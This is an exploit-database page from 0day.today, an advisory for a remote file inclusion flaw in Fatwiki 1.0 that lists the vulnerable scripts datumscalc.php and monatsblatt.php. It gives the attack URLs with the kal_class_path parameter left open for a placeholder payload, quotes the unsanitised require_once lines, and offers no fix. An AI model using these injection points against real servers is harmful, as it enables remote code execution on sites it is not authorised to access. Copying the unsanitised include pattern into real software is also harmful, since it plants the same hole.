[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Fatwiki (fwiki) Remote FiLe include RFI

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10694
Category
web applications
Date add
18-01-2010
Platform
unsorted
=======================================
Fatwiki (fwiki) Remote FiLe include RFI
=======================================

#############################################################################################################
## Fatwiki (fwiki) Remote FiLe include RFI                                                                  ##
#############################################################################################################
 
[ Software Information ]
 
[+] Vendor : http://galupki.de/
[+] Download : http://galupki.de/zip/fwiki_10b.zip
[+] version : 1.0
[+] Vulnerability : RFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/datumscalc.php?kal_class_path=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/monatsblatt.php?kal_class_path=[INDONESIANCODER]
 
[ BUG ]
 
[!] datumscalc.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");
 
[!] monatsblatt.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");
     - require_once("$kal_class_path/minikal.php");
 
[ FIX ]
 
dunno :">
 
 
#############################################################################################################



#  0day.today [2024-11-15]  #